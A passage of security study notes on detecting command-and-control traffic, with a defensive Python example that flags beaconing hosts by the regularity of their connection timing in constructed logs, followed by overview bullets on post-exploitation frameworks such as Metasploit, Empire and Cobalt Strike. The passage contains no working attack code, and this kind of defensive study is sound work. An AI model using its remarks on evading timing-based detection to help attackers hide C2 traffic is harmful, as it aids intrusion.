- Network security controls like firewalls, intrusion detection/prevention systems (IDS/IPS), and web proxies can be configured to detect and block known C2 protocols and destinations
- Machine learning and anomaly detection techniques can help identify unusual network behavior that may indicate the presence of C2 activity
- Preventing C2 traffic also involves securing the endpoints, applying security patches, and educating users to reduce the risk of initial compromise
- Example: A security team using a network threat analytics platform to detect anomalous DNS queries and identifying a group of compromised systems communicating with a known C2 domain, allowing them to isolate the affected systems and prevent further damage
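The behavioural analysis mentioned above has one cheap, high-yield form: C2 implants check in on a timer (Cobalt Strike's sleep-plus-jitter setting is the textbook case), so the inter-arrival times between a host and a destination cluster tightly, while human-driven traffic is bursty. The following is an added example, not from the original page or from any product it names: it parses constructed proxy-style log lines, groups connections by (source, destination) and scores the coefficient of variation of the intervals. Names, thresholds and the sample data are this example's own.

```python
"""Beacon detection from connection timing (added example)."""
import collections
import statistics
from datetime import datetime, timedelta


def _build_sample_log():
    """Constructed: one host beaconing every ~60 s with jitter, plus ordinary browsing."""
    t0 = datetime(2024, 3, 4, 9, 0, 0)
    beacon_gaps = [60, 63, 57, 61, 59, 66, 55, 60, 62, 58, 64, 56]
    browse_gaps = [5, 340, 12, 2, 900, 45, 3, 1200, 7, 30, 410, 9]
    lines = []
    for dst, gaps in (('cdn-assets-sync.example', beacon_gaps), ('news.example.net', browse_gaps)):
        t = t0
        for gap in gaps:
            t += timedelta(seconds=gap)
            lines.append(f'{t:%Y-%m-%dT%H:%M:%SZ} 10.20.30.40 {dst} 443 200')
    return sorted(lines)


SAMPLE_LOG = _build_sample_log()   # "<timestamp> <src> <dst> <port> <status>"


def parse_line(line: str):
    ts, src, dst, _port, _status = line.split()
    return datetime.strptime(ts, '%Y-%m-%dT%H:%M:%SZ'), src, dst


def beacon_scores(lines, min_connections: int = 8) -> dict:
    """Return {(src, dst): (count, mean_interval_s, cv)} for pairs with enough connections.
    cv = population stddev / mean of the inter-arrival times: 0 for a perfect timer."""
    times = collections.defaultdict(list)
    for line in lines:
        ts, src, dst = parse_line(line)
        times[(src, dst)].append(ts)
    scores = {}
    for key, stamps in times.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float('inf')
        scores[key] = (len(stamps), round(mean, 1), round(cv, 3))
    return scores


def find_beacons(lines, max_cv: float = 0.35, min_connections: int = 8) -> dict:
    """Uniform jitter of 10% on the sleep gives cv near 0.03, 50% jitter about 0.2;
    interactive traffic is normally well above 1."""
    return {k: v for k, v in beacon_scores(lines, min_connections).items() if v[2] <= max_cv}


if __name__ == '__main__':
    for key, (count, mean, cv) in beacon_scores(SAMPLE_LOG).items():
        print(key, count, mean, cv, 'BEACON' if cv <= 0.35 else '')
```

On the sample the 60-second check-in scores a cv around 0.05 and the browsing session well above 1. In production the score is a triage input, not a verdict: software updaters, NTP and monitoring agents beacon too, so join the result with destination age and reputation, and expect operators to lengthen sleeps or use the HTTP(S) request body rather than timing to blend in.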
Post-exploitation frameworks
- Post-exploitation frameworks are software tools and libraries that provide a set of functionalities and modules to facilitate the post-exploitation phase of an attack
- These frameworks offer a wide range of features, such as privilege escalation, lateral movement, data exfiltration, and persistence mechanisms, making it easier for attackers to perform various actions on compromised systems
- Popular post-exploitation frameworks include the Metasploit Framework (with its Meterpreter payload), Empire (originally PowerShell Empire), and Cobalt Strike, each with its own strengths and use cases
Metasploit Framework
- Metasploit Framework is a widely-used open-source post-exploitation framework that provides a comprehensive set of tools and modules for exploiting vulnerabilities, deploying payloads,